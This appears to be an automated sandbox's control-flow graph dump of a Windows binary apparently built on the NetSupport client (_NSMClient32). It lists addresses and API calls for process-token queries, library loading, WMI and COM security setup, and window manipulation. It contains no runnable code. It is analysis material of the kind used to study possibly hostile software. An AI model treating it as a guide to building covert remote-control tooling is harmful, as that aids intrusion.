99232->99234 99236 110fad08 99235->99236 99237 110facf7 99235->99237 99246 110f1f50 9 API calls 99236->99246 99238 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99237->99238 99241 110fad04 99238->99241 99240 110fad2c 99240->99237 99242 110fad34 99240->99242 99241->99226 99242->99242 99243 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99242->99243 99244 110fad5a 99243->99244 99244->99226 99245->99223 99246->99240 99247 11089a40 99248 1110f6c0 ___DllMainCRTStartup 4 API calls 99247->99248 99249 11089a53 99248->99249 99250 11089a5d 99249->99250 99259 11089150 268 API calls std::_Mutex::_Mutex 99249->99259 99253 11089a84 99250->99253 99260 11089150 268 API calls std::_Mutex::_Mutex 99250->99260 99255 11089a93 99253->99255 99256 11089a10 99253->99256 99261 110896a0 99256->99261 99259->99250 99260->99253 99302 11088970 6 API calls ___DllMainCRTStartup 99261->99302 99263 110896d9 GetParent 99264 110896ec 99263->99264 99265 110896fd 99263->99265 99267 110896f0 GetParent 
99264->99267 99266 11144dc0 267 API calls 99265->99266 99268 11089709 99266->99268 99267->99265 99267->99267 99269 11163fed std::_Mutex::_Mutex 143 API calls 99268->99269 99270 11089716 std::ios_base::_Tidy 99269->99270 99271 11144dc0 267 API calls 99270->99271 99272 1108972f 99271->99272 99303 11013830 22 API calls 2 library calls 99272->99303 99274 1108974a 99274->99274 99275 11143230 std::_Mutex::_Mutex 8 API calls 99274->99275 99277 1108978a std::ios_base::_Tidy 99275->99277 99276 110897a5 99278 11163db7 std::_Mutex::_Mutex 102 API calls 99276->99278 99281 110897c3 std::_Mutex::_Mutex 99276->99281 99277->99276 99279 11142290 std::_Mutex::_Mutex 265 API calls 99277->99279 99278->99281 99279->99276 99280 11089874 std::ios_base::_Tidy 99282 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99280->99282 99281->99280 99283 1102a620 std::_Mutex::_Mutex 145 API calls 99281->99283 99285 11089962 99282->99285 99284 11089813 99283->99284 99286 11142290 std::_Mutex::_Mutex 265 API calls 99284->99286 99285->99255 99287 1108981b 99286->99287 99288 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 99287->99288 99289 11089832 99288->99289 99289->99280 99290 11081bb0 86 API calls 99289->99290 99291 1108984a 99290->99291 99292 1108988e 99291->99292 99293 11089851 99291->99293 99294 11081bb0 86 API calls 99292->99294 99304 110b75d0 99293->99304 99296 11089899 99294->99296 99296->99280 99298 110b75d0 68 API calls 99296->99298 99300 110898a6 99298->99300 99299 110b75d0 68 API calls 99299->99280 99300->99280 99301 110b75d0 68 API calls 99300->99301 99301->99280 99302->99263 99303->99274 99307 110b75b0 99304->99307 99310 111672e3 99307->99310 99313 11167264 99310->99313 99314 11167271 99313->99314 99315 1116728b 99313->99315 99331 11169302 66 API calls __getptd_noexit 99314->99331 99315->99314 99316 11167294 GetFileAttributesA 99315->99316 99318 111672a2 GetLastError 99316->99318 99324 111672b8 99316->99324 99334 11169315 66 API calls 3 library calls 
99318->99334 99319 11167276 99332 111692ef 66 API calls __getptd_noexit 99319->99332 99322 11089857 99322->99280 99322->99299 99323 111672ae 99335 111692ef 66 API calls __getptd_noexit 99323->99335 99324->99322 99336 11169302 66 API calls __getptd_noexit 99324->99336 99325 1116727d 99333 1116df04 11 API calls __gmtime64_s 99325->99333 99329 111672cb 99337 111692ef 66 API calls __getptd_noexit 99329->99337 99331->99319 99332->99325 99333->99322 99334->99323 99335->99322 99336->99329 99337->99323 99338 4b1020 GetCommandLineA 99339 4b1035 GetStartupInfoA 99338->99339 99341 4b108b 99339->99341 99342 4b1090 GetModuleHandleA 99339->99342 99341->99342 99345 4b1000 _NSMClient32 99342->99345 99344 4b10a2 ExitProcess 99345->99344 99346 111071e0 99347 111071ec 99346->99347 99348 1110720f 99347->99348 99349 111450a0 std::_Mutex::_Mutex 90 API calls 99347->99349 99354 11107218 99348->99354 99392 11106100 GetTickCount EnterCriticalSection GetTickCount 99348->99392 99351 11107201 99349->99351 99351->99348 99355 111062e0 99351->99355 99352 11107223 99429 11163180 99355->99429 99357 111062fb LoadLibraryA 99440 11137340 279 API calls 2 library calls 99357->99440 99359 11106361 99360 11106365 99359->99360 99361 1110637d 99359->99361 99360->99361 99363 1110636a 99360->99363 99362 111450a0 std::_Mutex::_Mutex 90 API calls 99361->99362 99364 11106386 99362->99364 99365 11106375 99363->99365 99366 1110636e FreeLibrary 99363->99366 99367 111063a1 LoadLibraryA GetProcAddress 99364->99367 99368 11106397 99364->99368 99370 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99365->99370 99366->99365 99369 111064d1 SetLastError 99367->99369 99379 11106443 99367->99379 99368->99367 99371 1110660f 99369->99371 99372 11106665 99370->99372 99373 111450a0 std::_Mutex::_Mutex 90 API calls 99371->99373 99372->99348 99374 11106624 99373->99374 99375 11106635 FreeLibrary 99374->99375 99376 1110663c 99374->99376 99375->99376 99376->99365 99377 11106640 FreeLibrary 
99376->99377 99377->99365 99378 111064f2 OpenProcess 99378->99379 99390 11106497 99378->99390 99379->99371 99379->99378 99379->99390 99430 11025d00 99379->99430 99380 111064a5 GetProcAddress 99382 111064de SetLastError 99380->99382 99380->99390 99382->99390 99383 111065e5 CloseHandle 99383->99371 99383->99390 99384 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 99384->99390 99385 11081bb0 86 API calls 99385->99390 99386 11106556 OpenProcessToken 99386->99383 99386->99390 99387 11106574 GetTokenInformation 99388 111065d8 CloseHandle 99387->99388 99387->99390 99388->99383 99389 11106100 281 API calls 99389->99390 99390->99371 99390->99378 99390->99379 99390->99380 99390->99383 99390->99384 99390->99385 99390->99386 99390->99387 99390->99388 99390->99389 99441 110f5e90 25 API calls std::_Mutex::_Mutex 99390->99441 99393 11106153 99392->99393 99394 11106148 99392->99394 99396 11106172 99393->99396 99397 111061ca GetTickCount LeaveCriticalSection 99393->99397 99395 11146450 std::_Mutex::_Mutex 21 API calls 99394->99395 99395->99393 99398 11106190 GetTickCount LeaveCriticalSection 99396->99398 99442 11029450 265 API calls 2 library calls 99396->99442 99399 111061f0 EnterCriticalSection 99397->99399 99400 111061e2 99397->99400 99402 111061b3 99398->99402 99403 111061a8 99398->99403 99405 11106219 99399->99405 99404 11146450 std::_Mutex::_Mutex 21 API calls 99400->99404 99402->99352 99407 11146450 std::_Mutex::_Mutex 21 API calls 99403->99407 99408 111061ed 99404->99408 99409 11106223 99405->99409 99410 11106244 99405->99410 99407->99402 99408->99399 99411 111062be LeaveCriticalSection 99409->99411 99412 1110622e 99409->99412 99413 1110f420 std::_Mutex::_Mutex 265 API calls 99410->99413 99411->99352 99443 11029450 265 API calls 2 library calls 99412->99443 99415 1110624e 99413->99415 99417 11106267 99415->99417 99444 110f0cf0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 99415->99444 99420 11106274 99417->99420 99421 1110628b 99417->99421 
99418 111062bb 99418->99411 99445 11029450 265 API calls 2 library calls 99420->99445 99446 110ebfb0 268 API calls 4 library calls 99421->99446 99424 111062a0 99447 11148f50 67 API calls std::ios_base::_Tidy 99424->99447 99427 111062af 99428 11146450 std::_Mutex::_Mutex 21 API calls 99427->99428 99428->99418 99429->99357 99431 11025d0e GetProcAddress 99430->99431 99432 11025d1f 99430->99432 99431->99432 99433 11025d38 99432->99433 99434 11025d2c K32GetProcessImageFileNameA 99432->99434 99436 11025d3e GetProcAddress 99433->99436 99437 11025d4f 99433->99437 99434->99433 99435 11025d71 99434->99435 99435->99390 99436->99437 99438 11025d56 99437->99438 99439 11025d67 SetLastError 99437->99439 99438->99390 99439->99435 99440->99359 99441->99390 99444->99417 99446->99424 99447->99427 99448 110173f0 GetTickCount 99455 11017300 99448->99455 99453 11146450 std::_Mutex::_Mutex 21 API calls 99454 11017437 99453->99454 99456 11017320 99455->99456 99463 110173d6 99455->99463 99458 11017342 CoInitialize _GetRawWMIStringW 99456->99458 99461 11017339 WaitForSingleObject 99456->99461 99457 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99460 110173e5 99457->99460 99459 110173c2 99458->99459 99464 11017375 99458->99464 99462 110173d0 CoUninitialize 99459->99462 99459->99463 99468 11017220 99460->99468 99461->99458 99462->99463 99463->99457 99464->99459 99465 110173bc 99464->99465 99467 11163a2d std::_Mutex::_Mutex 79 API calls 99464->99467 99481 11163837 67 API calls __fassign 99465->99481 99467->99464 99469 11017240 99468->99469 99470 110172e6 99468->99470 99472 11017258 CoInitialize _GetRawWMIStringW 99469->99472 99473 1101724f WaitForSingleObject 99469->99473 99471 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99470->99471 99475 110172f5 SetEvent GetTickCount 99471->99475 99474 110172d2 99472->99474 99478 1101728b 99472->99478 99473->99472 99474->99470 99476 110172e0 CoUninitialize 99474->99476 99475->99453 
99476->99470 99477 110172cc 99482 11163837 67 API calls __fassign 99477->99482 99478->99474 99478->99477 99480 11163a2d std::_Mutex::_Mutex 79 API calls 99478->99480 99480->99478 99481->99459 99482->99474 99483 11025cd0 LoadLibraryA 99484 1113cd60 99485 1113cd69 99484->99485 99486 1113cd6e 99484->99486 99488 11139090 99485->99488 99489 111390d2 99488->99489 99490 111390c7 GetCurrentThreadId 99488->99490 99491 111390e0 99489->99491 99622 11029330 99489->99622 99490->99489 99629 11133920 99491->99629 99497 111391d1 99503 11139202 FindWindowA 99497->99503 99507 1113929a 99497->99507 99498 1113975a 99499 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99498->99499 99501 11139772 99499->99501 99501->99486 99502 1113911c IsWindow IsWindowVisible 99504 11146450 std::_Mutex::_Mutex 21 API calls 99502->99504 99505 11139217 IsWindowVisible 99503->99505 99503->99507 99509 11139147 99504->99509 99506 1113921e 99505->99506 99505->99507 99506->99507 99514 11138c30 392 API calls 99506->99514 99508 111392bf 99507->99508 99510 1105dd10 79 API calls 99507->99510 99511 11139470 99508->99511 99515 1105dd10 79 API calls 99508->99515 99512 1105dd10 79 API calls 99509->99512 99533 111392e7 99510->99533 99513 1113948a 99511->99513 99517 11138c30 392 API calls 99511->99517 99516 11139163 IsWindowVisible 99512->99516 99519 111394a7 99513->99519 99865 1106b860 298 API calls 99513->99865 99518 1113923f IsWindowVisible 99514->99518 99520 1113945f 99515->99520 99516->99497 99521 11139171 99516->99521 99517->99513 99518->99507 99522 1113924e IsIconic 99518->99522 99866 1112ce90 12 API calls 2 library calls 99519->99866 99520->99511 99525 11139464 99520->99525 99521->99497 99526 11139179 99521->99526 99522->99507 99528 1113925f GetForegroundWindow 99522->99528 99864 1102cff0 294 API calls std::_Mutex::_Mutex 99525->99864 99527 11146450 std::_Mutex::_Mutex 21 API calls 99526->99527 99531 11139183 GetForegroundWindow 99527->99531 99862 11131210 147 API calls 
99528->99862 99529 111394ac 99535 111394b4 99529->99535 99536 111394bd 99529->99536 99538 11139192 EnableWindow 99531->99538 99539 111391be 99531->99539 99533->99508 99534 11139334 99533->99534 99541 11081a70 IsDBCSLeadByte 99533->99541 99543 11143230 std::_Mutex::_Mutex 8 API calls 99534->99543 99867 11131b00 89 API calls 2 library calls 99535->99867 99544 111394d4 99536->99544 99545 111394c8 99536->99545 99537 1113946b 99537->99511 99860 11131210 147 API calls 99538->99860 99539->99497 99555 111391ca SetForegroundWindow 99539->99555 99540 1113926e 99863 11131210 147 API calls 99540->99863 99541->99534 99550 11139346 99543->99550 99869 111317a0 299 API calls std::_Mutex::_Mutex 99544->99869 99551 111394d9 99545->99551 99868 11131870 299 API calls std::_Mutex::_Mutex 99545->99868 99549 111394ba 99549->99536 99557 11139353 GetLastError 99550->99557 99567 11139361 99550->99567 99553 111394d2 99551->99553 99554 111395e9 99551->99554 99552 111391a9 99861 11131210 147 API calls 99552->99861 99553->99551 99564 111394f1 99553->99564 99566 1113959b 99553->99566 99561 111386b0 295 API calls 99554->99561 99555->99497 99556 11139275 99562 1113928b EnableWindow 99556->99562 99565 11139284 SetForegroundWindow 99556->99565 99559 11146450 std::_Mutex::_Mutex 21 API calls 99557->99559 99559->99567 99581 111395ee 99561->99581 99562->99507 99563 111391b0 EnableWindow 99563->99539 99564->99554 99571 1110f420 std::_Mutex::_Mutex 265 API calls 99564->99571 99565->99562 99566->99554 99877 1103f000 68 API calls 99566->99877 99567->99508 99570 111393b2 99567->99570 99574 11081a70 IsDBCSLeadByte 99567->99574 99568 11139615 99578 1105dd10 79 API calls 99568->99578 99621 1113973a std::ios_base::_Tidy 99568->99621 99576 11143230 std::_Mutex::_Mutex 8 API calls 99570->99576 99575 11139512 99571->99575 99572 111395aa 99878 1103f040 68 API calls 99572->99878 99574->99570 99579 11139533 99575->99579 99870 110573b0 308 API calls std::_Mutex::_Mutex 99575->99870 99580 111393c4 99576->99580 99577 
111395b5 99879 1103f060 68 API calls 99577->99879 99595 11139645 99578->99595 99871 1110f260 InterlockedIncrement 99579->99871 99580->99508 99584 111393cb GetLastError 99580->99584 99581->99568 99776 11142210 99581->99776 99587 11146450 std::_Mutex::_Mutex 21 API calls 99584->99587 99586 111395c0 99880 1103f020 68 API calls 99586->99880 99587->99508 99589 11139558 99872 1104ce00 993 API calls 99589->99872 99592 111395cb 99881 1110f270 InterlockedDecrement 99592->99881 99593 11139563 99873 1104e340 993 API calls 99593->99873 99596 1113968d 99595->99596 99599 1113966a 99595->99599 99600 11139699 GetTickCount 99595->99600 99595->99621 99596->99600 99596->99621 99598 11139599 99598->99554 99602 11146450 std::_Mutex::_Mutex 21 API calls 99599->99602 99603 111396ab 99600->99603 99600->99621 99601 1113956e 99874 1104e3b0 993 API calls 99601->99874 99605 11139675 GetTickCount 99602->99605 99606 11142e80 145 API calls 99603->99606 99605->99621 99607 111396b7 99606->99607 99609 11146ee0 269 API calls 99607->99609 99608 11139579 99875 1104ce40 993 API calls 99608->99875 99611 111396c2 99609->99611 99613 11142e80 145 API calls 99611->99613 99612 11139584 99612->99554 99876 110ebf30 285 API calls 99612->99876 99614 111396d5 99613->99614 99882 11025bb0 LoadLibraryA 99614->99882 99617 111396e2 99617->99617 99883 1112c7a0 GetProcAddress SetLastError 99617->99883 99619 11139729 99620 11139733 FreeLibrary 99619->99620 99619->99621 99620->99621 99621->99498 99884 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 99622->99884 99624 1102933e 99625 11029353 99624->99625 99885 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 99624->99885 99886 11089cc0 269 API calls 2 library calls 99625->99886 99628 1102935e 99628->99491 99630 11133962 99629->99630 99631 11133c84 99629->99631 99633 1105dd10 79 API calls 99630->99633 99632 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99631->99632 99634 11133c9c 99632->99634 
99635 11133982 99633->99635 99677 11133400 99634->99677 99635->99631 99636 1113398a GetLocalTime 99635->99636 99637 111339c1 LoadLibraryA 99636->99637 99638 111339a0 99636->99638 99887 110098c0 LoadLibraryA 99637->99887 99639 11146450 std::_Mutex::_Mutex 21 API calls 99638->99639 99641 111339b5 99639->99641 99641->99637 99642 11133a15 99888 11015c30 LoadLibraryA 99642->99888 99644 11133a20 GetCurrentProcess 99645 11133a45 GetProcAddress 99644->99645 99646 11133a5d GetProcessHandleCount 99644->99646 99645->99646 99647 11133a66 SetLastError 99645->99647 99648 11133a6e 99646->99648 99647->99648 99649 11133a92 99648->99649 99650 11133a78 GetProcAddress 99648->99650 99652 11133aa0 GetProcAddress 99649->99652 99653 11133aba 99649->99653 99650->99649 99651 11133ac7 SetLastError 99650->99651 99651->99652 99652->99653 99654 11133ad4 SetLastError 99652->99654 99655 11133adf GetProcAddress 99653->99655 99654->99655 99656 11133af1 K32GetProcessMemoryInfo 99655->99656 99657 11133aff SetLastError 99655->99657 99658 11133b07 99656->99658 99657->99658 99659 11146450 std::_Mutex::_Mutex 21 API calls 99658->99659 99663 11133b7d 99658->99663 99659->99663 99660 11133c5a 99661 11133c6a FreeLibrary 99660->99661 99662 11133c6d 99660->99662 99661->99662 99664 11133c77 FreeLibrary 99662->99664 99665 11133c7a 99662->99665 99663->99660 99667 1105dd10 79 API calls 99663->99667 99664->99665 99665->99631 99666 11133c81 FreeLibrary 99665->99666 99666->99631 99668 11133bce 99667->99668 99669 1105dd10 79 API calls 99668->99669 99670 11133bf6 99669->99670 99671 1105dd10 79 API calls 99670->99671 99672 11133c1d 99671->99672 99673 1105dd10 79 API calls 99672->99673 99674 11133c44 99673->99674 99674->99660 99675 11133c55 99674->99675 99889 11027780 265 API calls 2 library calls 99675->99889 99679 1113342d 99677->99679 99678 111338e9 99678->99497 99678->99498 99780 11138c30 99678->99780 99679->99678 99680 110d1550 268 API calls 99679->99680 99681 1113348e 99680->99681 99682 110d1550 268 API calls 
99681->99682 99683 11133499 99682->99683 99684 111334c7 99683->99684 99685 111334de 99683->99685 99890 11029450 265 API calls 2 library calls 99684->99890 99687 11146450 std::_Mutex::_Mutex 21 API calls 99685->99687 99689 111334ec 99687->99689 99891 110d12e0 265 API calls 99689->99891 99777 1114221a 99776->99777 99779 1114222f 99776->99779 99892 11141890 99777->99892 99779->99568 99783 11138c4d 99780->99783 99838 1113906f 99780->99838 99781 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99782 1113907e 99781->99782 99782->99502 99784 111450a0 std::_Mutex::_Mutex 90 API calls 99783->99784 99783->99838 99785 11138c8c 99784->99785 99786 1105dd10 79 API calls 99785->99786 99785->99838 99787 11138cbb 99786->99787 100028 1112c920 99787->100028 99789 11138dab 99790 11138e00 PostMessageA 99789->99790 99791 1105dd10 79 API calls 99789->99791 99792 11138e15 99790->99792 99793 11138dfc 99791->99793 99794 11138e25 99792->99794 100037 1110f270 InterlockedDecrement 99792->100037 99793->99790 99793->99792 99796 11138e2b 99794->99796 99797 11138e4d 99794->99797 99799 11138e83 std::ios_base::_Tidy 99796->99799 99800 11138e9e 99796->99800 100038 11130410 315 API calls std::_Mutex::_Mutex 99797->100038 99808 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99799->99808 99804 11142e80 145 API calls 99800->99804 99801 11138e55 100039 11146ec0 267 API calls 99801->100039 99806 11138ea3 99804->99806 99805 11138e5f 100040 1112cb20 SetDlgItemTextA 99805->100040 99809 11146ee0 269 API calls 99806->99809 99812 11138e9a 99808->99812 99810 11138eaa SetWindowTextA 99809->99810 99813 11138ec6 99810->99813 99820 11138ecd std::ios_base::_Tidy 99810->99820 99811 11138e70 std::ios_base::_Tidy 99811->99796 99812->99502 100041 111352b0 299 API calls 5 library calls 99813->100041 99814 11145b40 271 API calls 99814->99789 99816 11138f24 99817 11138f38 99816->99817 99818 11138ffc 99816->99818 99821 11138f5c 99817->99821 100044 111352b0 299 
API calls 5 library calls 99817->100044 99823 1113901d 99818->99823 99828 1113900b 99818->99828 99829 11139004 99818->99829 99819 11138ef7 99819->99816 99824 11138f0c 99819->99824 99820->99816 99820->99819 100042 111352b0 299 API calls 5 library calls 99820->100042 100046 110f8640 86 API calls 99821->100046 100050 110f8640 86 API calls 99823->100050 100043 11131210 147 API calls 99824->100043 100049 11131210 147 API calls 99828->100049 100048 111352b0 299 API calls 5 library calls 99829->100048 99830 11138f1c 99830->99816 99833 11139028 99833->99838 99839 1113902c IsWindowVisible 99833->99839 99834 11138f67 99834->99838 99840 11138f6f IsWindowVisible 99834->99840 99836 1113901a 99836->99823 99837 11138f46 99837->99821 99841 11138f52 99837->99841 99838->99781 99839->99838 99842 1113903e IsWindowVisible 99839->99842 99840->99838 99843 11138f86 99840->99843 100045 11131210 147 API calls 99841->100045 99842->99838 99846 1113904b EnableWindow 99842->99846 99844 111450a0 std::_Mutex::_Mutex 90 API calls 99843->99844 99847 11138f91 99844->99847 100051 11131210 147 API calls 99846->100051 99847->99838 99850 11138f9c GetForegroundWindow IsWindowVisible 99847->99850 99848 11138f59 99848->99821 99852 11138fc1 99850->99852 99853 11138fb6 EnableWindow 99850->99853 99851 11139062 EnableWindow 99851->99838 100047 11131210 147 API calls 99852->100047 99853->99852 99855 11138fc8 99856 11138fde EnableWindow 99855->99856 99857 11138fd7 SetForegroundWindow 99855->99857 99858 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99856->99858 99857->99856 99859 11138ff8 99858->99859 99859->99502 99860->99552 99861->99563 99862->99540 99863->99556 99864->99537 99865->99519 99866->99529 99867->99549 99868->99553 99869->99551 99870->99579 99871->99589 99872->99593 99873->99601 99874->99608 99875->99612 99876->99598 99877->99572 99878->99577 99879->99586 99880->99592 99881->99598 99882->99617 99883->99619 99884->99624 99885->99624 99886->99628 99887->99642 
99888->99644 99889->99660 99893 111418cf 99892->99893 99944 111418c8 std::ios_base::_Tidy 99892->99944 99894 1110f420 std::_Mutex::_Mutex 265 API calls 99893->99894 99895 111418d6 99894->99895 99898 11141906 99895->99898 100019 11060f70 301 API calls std::_Mutex::_Mutex 99895->100019 99896 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 99897 1114220a 99896->99897 99897->99779 99900 11061700 275 API calls 99898->99900 99901 11141942 99900->99901 99902 11141949 RegCloseKey 99901->99902 99903 11141950 std::_Mutex::_Mutex 99901->99903 99902->99903 99904 11144dc0 267 API calls 99903->99904 99905 1114196c 99904->99905 99906 11143230 std::_Mutex::_Mutex 8 API calls 99905->99906 99907 11141980 99906->99907 99908 11141997 99907->99908 99909 11062d60 330 API calls 99907->99909 99910 1110f420 std::_Mutex::_Mutex 265 API calls 99908->99910 99909->99908 99911 1114199e 99910->99911 99912 111419ba 99911->99912 100020 11060be0 293 API calls std::_Mutex::_Mutex 99911->100020 99914 1110f420 std::_Mutex::_Mutex 265 API calls 99912->99914 99915 111419d3 99914->99915 99916 111419ef 99915->99916 100021 11060be0 293 API calls std::_Mutex::_Mutex 99915->100021 99918 1110f420 std::_Mutex::_Mutex 265 API calls 99916->99918 99919 11141a08 99918->99919 99920 11141a24 99919->99920 100022 11060be0 293 API calls std::_Mutex::_Mutex 99919->100022 99922 11060760 268 API calls 99920->99922 99923 11141a4d 99922->99923 99924 11060760 268 API calls 99923->99924 99961 11141a67 99924->99961 99925 11141d95 99926 110d1550 268 API calls 99925->99926 99928 11142179 99925->99928 99929 11141db3 99926->99929 99927 110607f0 274 API calls 99927->99961 99935 11060640 69 API calls 99928->99935 99932 1105dd10 79 API calls 99929->99932 99930 11141d85 99931 11146450 std::_Mutex::_Mutex 21 API calls 99930->99931 99931->99925 99934 11141df0 99932->99934 99933 11146450 21 API calls std::_Mutex::_Mutex 99933->99961 99936 11141f3d 99934->99936 99938 11060760 268 API calls 99934->99938 
99937 111421d2 99935->99937 99940 11060f40 274 API calls 99936->99940 99939 11060640 69 API calls 99937->99939 99943 11141e0e 99938->99943 99939->99944 99941 11141f59 99940->99941 100023 110679c0 298 API calls std::_Mutex::_Mutex 99941->100023 99942 111319f0 86 API calls 99942->99961 99945 110607f0 274 API calls 99943->99945 99944->99896 99953 11141e1d 99945->99953 99947 11141e52 99948 11060760 268 API calls 99947->99948 99951 11141e68 99948->99951 99949 11141f83 99952 11141fb3 EnterCriticalSection 99949->99952 99963 11141f87 99949->99963 99950 11146450 std::_Mutex::_Mutex 21 API calls 99950->99953 99955 110607f0 274 API calls 99951->99955 99956 11060420 271 API calls 99952->99956 99953->99947 99953->99950 99954 110607f0 274 API calls 99953->99954 99954->99953 99973 11141e78 99955->99973 99957 11141fd0 99956->99957 99959 11060f40 274 API calls 99957->99959 99964 11141fe6 99959->99964 99960 11081bb0 86 API calls 99960->99961 99961->99925 99961->99927 99961->99930 99961->99933 99961->99942 99961->99960 99967 11081c60 86 API calls std::_Mutex::_Mutex 99961->99967 99962 11141eb1 99965 11060760 268 API calls 99962->99965 99963->99952 100024 110508e0 365 API calls 4 library calls 99963->100024 100025 110679c0 298 API calls std::_Mutex::_Mutex 99963->100025 99966 11141ffa LeaveCriticalSection 99964->99966 99971 1102a9f0 283 API calls 99964->99971 99969 11141ec7 99965->99969 99972 1114200e 99966->99972 100005 1114204e 99966->100005 99967->99961 99968 11146450 std::_Mutex::_Mutex 21 API calls 99968->99973 99970 110607f0 274 API calls 99969->99970 99988 11141ed6 99970->99988 99975 11141ff7 99971->99975 99980 11146450 std::_Mutex::_Mutex 21 API calls 99972->99980 99972->100005 99973->99962 99973->99968 99977 110607f0 274 API calls 99973->99977 99975->99966 99976 11133400 273 API calls 99979 11142058 99976->99979 99977->99973 99978 11141f11 99982 11060640 69 API calls 99978->99982 99981 110d1550 268 API calls 99979->99981 99983 1114201c 99980->99983 99985 11142066 99981->99985 
99986 11141f1f 99982->99986 99987 1113cc30 311 API calls 99983->99987 99984 11146450 std::_Mutex::_Mutex 21 API calls 99984->99988 100026 110cff20 265 API calls std::_Mutex::_Mutex 99985->100026 99990 11142021 99987->99990 99988->99978 99988->99984 99991 110607f0 274 API calls 99988->99991 99993 111414a0 1696 API calls 99990->99993 99991->99988 100005->99976 100019->99898 100020->99912 100021->99916 100022->99920 100023->99949 100024->99963 100025->99963 100030 1112c93c 100028->100030 100029 1112c977 100052 1106b860 298 API calls 100029->100052 100030->100029 100031 1112c964 100030->100031 100033 11146ee0 269 API calls 100031->100033 100035 1112c96f 100033->100035 100034 1112c9c3 100034->99789 100034->99814 100035->100034 100036 11142290 std::_Mutex::_Mutex 265 API calls 100035->100036 100036->100034 100037->99794 100038->99801 100039->99805 100040->99811 100041->99820 100042->99819 100043->99830 100044->99837 100045->99848 100046->99834 100047->99855 100048->99828 100049->99836 100050->99833 100051->99851 100052->100035 100053 11144200 100054 11144211 100053->100054 100067 11143c20 100054->100067 100058 11144295 100061 111442b2 100058->100061 100063 11144294 100058->100063 100059 1114425b 100060 11144262 ResetEvent 100059->100060 100075 11143de0 265 API calls 2 library calls 100060->100075 100063->100058 100076 11143de0 265 API calls 2 library calls 100063->100076 100064 11144276 SetEvent WaitForMultipleObjects 100064->100060 100064->100063 100066 111442af 100066->100061 100068 11143c2c GetCurrentProcess 100067->100068 100069 11143c4f 100067->100069 100068->100069 100070 11143c3d GetModuleFileNameA 100068->100070 100071 11143c79 WaitForMultipleObjects 100069->100071 100072 1110f420 std::_Mutex::_Mutex 263 API calls 100069->100072 100070->100069 100071->100058 100071->100059 100073 11143c6b 100072->100073 100073->100071 100077 11143570 GetModuleFileNameA 100073->100077 100075->100064 100076->100066 100078 111435f3 100077->100078 100079 111435b3 100077->100079 
100082 111435ff LoadLibraryA 100078->100082 100083 11143619 GetModuleHandleA GetProcAddress 100078->100083 100080 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 100079->100080 100081 111435c1 100080->100081 100081->100078 100084 111435c8 LoadLibraryA 100081->100084 100082->100083 100085 1114360e LoadLibraryA 100082->100085 100086 11143647 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 100083->100086 100087 11143639 100083->100087 100084->100078 100085->100083 100088 11143673 10 API calls 100086->100088 100087->100088 100089 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 100088->100089 100090 111436f0 100089->100090 100090->100071 100091 1115bde0 100092 1115bdf4 100091->100092 100093 1115bdec 100091->100093 100103 111631ab 100092->100103 100096 1115be14 100097 1115bf40 100099 11162be5 _free 66 API calls 100097->100099 100100 1115bf68 100099->100100 100101 1115be31 100101->100097 100102 1115bf24 SetLastError 100101->100102 100102->100101 100104 11170166 _calloc 66 API calls 100103->100104 100105 111631c5 100104->100105 100106 1115be08 100105->100106 100127 111692ef 66 API calls __getptd_noexit 100105->100127 100106->100096 100106->100097 100110 1115ba20 CoInitializeSecurity CoCreateInstance 100106->100110 100108 111631d8 100108->100106 100128 111692ef 66 API calls __getptd_noexit 100108->100128 100111 1115ba95 wsprintfW SysAllocString 100110->100111 100112 1115bc14 100110->100112 100116 1115badb 100111->100116 100113 11161d01 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 100112->100113 100115 1115bc40 100113->100115 100114 1115bc01 SysFreeString 100114->100112 100115->100101 100116->100114 100116->100116 100117 1115bb6c 100116->100117 100118 1115bb5a wsprintfW 100116->100118 100126 1115bbe9 100116->100126 100129 110974a0 100117->100129 100118->100117 100120 1115bb7e 100121 110974a0 266 API calls 100120->100121 100122 1115bb93 100121->100122 100134 11097550 InterlockedDecrement SysFreeString 
(Control-flow graph edge list omitted; it is the text dump of a rendered graph. Functions and API calls recoverable from it: 110304b8: OpenMutexA, CreateMutexA, LoadLibraryA, GetProcAddress, SetLastError, WaitForSingleObject, CloseHandle, FreeLibrary; 1108a470: InitializeCriticalSection, RaiseException on failure; 11145ae0: LoadLibraryA, GetProcAddress, FreeLibrary; 6c5f5ae6 and 1116970d: C runtime start-up in two modules (HeapCreate, GetModuleHandleW, TlsAlloc, TlsSetValue, GetCommandLineA, GetEnvironmentStringsW, GetStartupInfoW, GetModuleFileNameA, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter); 6c5d63a0: WSACancelBlockingCall, Sleep; 11097550: InterlockedDecrement, SysFreeString.)

